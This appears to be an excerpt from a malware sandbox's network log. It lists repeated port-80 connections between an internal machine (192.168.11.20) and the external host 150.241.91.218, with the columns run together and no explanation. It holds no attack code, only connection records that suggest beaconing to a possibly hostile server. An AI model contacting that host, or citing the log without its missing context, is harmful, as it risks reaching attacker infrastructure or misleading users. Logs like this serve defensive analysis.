                                                                                                                                                              Nov 6, 2024 17:40:22.542121887 CET8050321150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:22.559727907 CET5032180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:22.560199976 CET5032280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:22.749234915 CET8050321150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:22.749279976 CET8050322150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:22.749458075 CET5032280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:22.749459028 CET5032180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:22.749630928 CET5032280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:22.749630928 CET5032280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:22.937467098 CET8050322150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:22.937479019 CET8050322150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:23.003680944 CET8050322150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:23.018150091 CET5032280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:23.018841982 CET5032380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:23.205830097 CET8050322150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:23.206032991 CET5032280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:23.206151962 CET8050323150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:23.206492901 CET5032380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:23.206562042 CET5032380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:23.206562042 CET5032380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:23.394588947 CET8050323150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:23.394629002 CET8050323150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:23.462323904 CET8050323150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:23.473839045 CET5032380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:23.474292994 CET5032480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:23.662069082 CET8050323150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:23.662283897 CET5032380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:23.662580967 CET8050324150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:23.662722111 CET5032480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:23.662874937 CET5032480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:23.662874937 CET5032480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:23.850567102 CET8050324150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:23.850581884 CET8050324150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:23.919241905 CET8050324150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:23.930499077 CET5032480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:23.930986881 CET5032580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:24.119601965 CET8050324150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:24.119712114 CET8050325150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:24.119889975 CET5032480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:24.119889975 CET5032580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:24.120098114 CET5032580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:24.120098114 CET5032580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:24.308054924 CET8050325150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:24.308073044 CET8050325150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:24.377357006 CET8050325150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:24.387748003 CET5032580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:24.388036966 CET5032680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:24.576067924 CET8050326150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:24.576083899 CET8050325150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:24.576323986 CET5032680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:24.576358080 CET5032580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:24.576445103 CET5032680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:24.576445103 CET5032680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:24.764275074 CET8050326150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:24.764338970 CET8050326150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:24.831470013 CET8050326150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:24.844106913 CET5032680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:24.844599962 CET5032780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:25.033277035 CET8050326150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:25.033293009 CET8050327150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:25.033494949 CET5032680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:25.033494949 CET5032780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:25.033633947 CET5032780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:25.033633947 CET5032780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:25.221904039 CET8050327150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:25.221915007 CET8050327150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:25.292136908 CET8050327150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:25.306667089 CET5032780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:25.307671070 CET5032880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:25.494618893 CET8050327150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:25.494959116 CET5032780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:25.495592117 CET8050328150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:25.495778084 CET5032880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:25.495907068 CET5032880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:25.495907068 CET5032880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:25.684027910 CET8050328150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:25.684048891 CET8050328150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:25.753640890 CET8050328150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:25.773402929 CET5032880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:25.774534941 CET5032980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:25.965507030 CET8050328150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:25.965665102 CET5032880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:25.966612101 CET8050329150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:25.966866016 CET5032980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:25.966964006 CET5032980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:25.966964006 CET5032980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:26.154742002 CET8050329150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:26.155041933 CET8050329150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:26.222363949 CET8050329150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:26.235635996 CET5032980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:26.236087084 CET5033080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:26.423710108 CET8050329150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:26.423721075 CET8050330150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:26.423880100 CET5032980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:26.423904896 CET5033080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:26.424052954 CET5033080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:26.424108982 CET5033080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:26.613403082 CET8050330150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:26.613419056 CET8050330150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:26.682312965 CET8050330150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:26.697495937 CET5033080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:26.697923899 CET5033180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:26.885360003 CET8050330150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:26.885498047 CET5033080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:26.885617971 CET8050331150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:26.885890007 CET5033180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:26.885986090 CET5033180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:26.885986090 CET5033180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:27.089039087 CET8050331150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:27.089085102 CET8050331150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:27.144404888 CET8050331150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:27.156465054 CET5033180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:27.156932116 CET5033280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:27.365262985 CET8050332150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:27.365278006 CET8050331150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:27.365648031 CET5033180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:27.365652084 CET5033280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:27.365681887 CET5033280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:27.365681887 CET5033280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:27.559628963 CET8050332150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:27.559642076 CET8050332150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:27.622807026 CET8050332150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:27.634109020 CET5033280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:27.634650946 CET5033380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:27.825078011 CET8050332150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:27.825093985 CET8050333150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:27.825298071 CET5033380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:27.825298071 CET5033280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:27.825520992 CET5033380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:27.825520992 CET5033380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:28.021584034 CET8050333150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:28.021631956 CET8050333150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:28.091152906 CET8050333150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:28.104334116 CET5033380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:28.104764938 CET5033480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:28.294462919 CET8050333150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:28.294492960 CET8050334150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:28.294653893 CET5033380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:28.294671059 CET5033480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:28.294892073 CET5033480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:28.294892073 CET5033480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:28.487132072 CET8050334150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:28.487169981 CET8050334150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:28.555283070 CET8050334150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:28.581420898 CET5033480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:28.581885099 CET5033580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:28.769155979 CET8050334150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:28.769438028 CET5033480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:28.769515038 CET8050335150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:28.769740105 CET5033580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:28.769856930 CET5033580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:28.769856930 CET5033580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:28.959966898 CET8050335150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:28.959985971 CET8050335150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:30.029903889 CET8050335150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:30.041666031 CET5033580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:30.042109013 CET5033680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:30.230047941 CET8050335150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:30.230130911 CET8050336150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:30.230268955 CET5033580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:30.230318069 CET5033680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:30.230441093 CET5033680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:30.230442047 CET5033680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:30.424911976 CET8050336150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:30.424943924 CET8050336150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:30.488516092 CET8050336150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:30.501967907 CET5033680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:30.502500057 CET5033780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:30.690548897 CET8050336150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:30.690841913 CET5033680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:30.700052023 CET8050337150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:30.700267076 CET5033780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:30.700411081 CET5033780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:30.700411081 CET5033780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:30.890103102 CET8050337150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:30.890115023 CET8050337150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:30.962778091 CET8050337150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:30.978929996 CET5033780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:30.979499102 CET5033880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:31.167433977 CET8050338150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:31.167473078 CET8050337150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:31.167701006 CET5033880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:31.167716026 CET5033780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:31.167860985 CET5033880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:31.167860985 CET5033880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:31.358083010 CET8050338150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:31.358093977 CET8050338150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:31.424489975 CET8050338150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:31.441077948 CET5033880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:31.441555023 CET5033980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:31.628853083 CET8050338150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:31.629009962 CET5033880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:31.629527092 CET8050339150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:31.629720926 CET5033980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:31.629872084 CET5033980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:31.629872084 CET5033980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:31.818476915 CET8050339150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:31.818490982 CET8050339150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:31.885730028 CET8050339150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:31.896578074 CET5033980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:31.897078037 CET5034080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:32.087157965 CET8050339150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:32.087296963 CET8050340150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:32.087651014 CET5033980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:32.087893963 CET5034080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:32.088046074 CET5034080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:32.088046074 CET5034080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:32.275993109 CET8050340150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:32.276009083 CET8050340150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:32.344161034 CET8050340150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:32.361938953 CET5034080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:32.362610102 CET5034180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:32.552438974 CET8050341150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:32.552654028 CET5034180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:32.552973032 CET5034180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:32.552973032 CET5034180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:32.553188086 CET8050340150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:32.553509951 CET5034080192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:32.741442919 CET8050341150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:32.741527081 CET8050341150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:32.809912920 CET8050341150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:32.820993900 CET5034180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:32.821465015 CET5034280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:33.010689974 CET8050341150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:33.010822058 CET5034180192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:33.012295961 CET8050342150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:33.012461901 CET5034280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:33.012597084 CET5034280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:33.012597084 CET5034280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:33.204317093 CET8050342150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:33.204340935 CET8050342150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:33.276810884 CET8050342150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:33.296801090 CET5034280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:33.297441959 CET5034380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:33.485181093 CET8050342150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:33.485517025 CET5034280192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:33.486174107 CET8050343150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:33.486530066 CET5034380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:33.486597061 CET5034380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:33.486597061 CET5034380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:33.682336092 CET8050343150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:33.682346106 CET8050343150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:33.748732090 CET8050343150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:33.763257027 CET5034380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:33.763711929 CET5034480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:33.951397896 CET8050343150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:33.951562881 CET5034380192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:33.956207037 CET8050344150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:33.956492901 CET5034480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:33.956608057 CET5034480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:33.956608057 CET5034480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:34.147928953 CET8050344150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:34.147937059 CET8050344150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:34.238984108 CET8050344150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:34.250200033 CET5034480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:34.250725031 CET5034580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:34.448430061 CET8050344150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:34.448443890 CET8050345150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:34.448836088 CET5034480192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:34.448836088 CET5034580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:34.448836088 CET5034580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:34.448836088 CET5034580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:34.639467001 CET8050345150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:34.639480114 CET8050345150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:34.721314907 CET8050345150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:34.734575987 CET5034580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:34.735023022 CET5034680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:34.923293114 CET8050346150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:34.923369884 CET8050345150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:34.923481941 CET5034680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:34.923537970 CET5034680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:34.923537970 CET5034680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:34.923615932 CET5034580192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:35.111228943 CET8050346150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:35.111238003 CET8050346150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:36.206655979 CET8050346150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:36.225545883 CET5034680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:36.226003885 CET5034780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:36.424191952 CET8050347150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:36.424201012 CET8050346150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:36.424387932 CET5034680192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:36.424408913 CET5034780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:36.424576998 CET5034780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:36.424576998 CET5034780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:36.616758108 CET8050347150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:36.686191082 CET8050347150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:36.698777914 CET5034780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:36.699259043 CET5034880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:36.886969090 CET8050347150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:36.887367010 CET5034780192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:36.887470007 CET8050348150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:36.887753963 CET5034880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:36.887833118 CET5034880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:36.887833118 CET5034880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:37.075674057 CET8050348150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:37.075737953 CET8050348150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:37.142952919 CET8050348150.241.91.218192.168.11.20
                                                                                                                                                              Nov 6, 2024 17:40:37.158062935 CET5034880192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:37.158720016 CET5034980192.168.11.20150.241.91.218
                                                                                                                                                              Nov 6, 2024 17:40:37.351038933 CET8050349150.241.91.218192.168.11.20
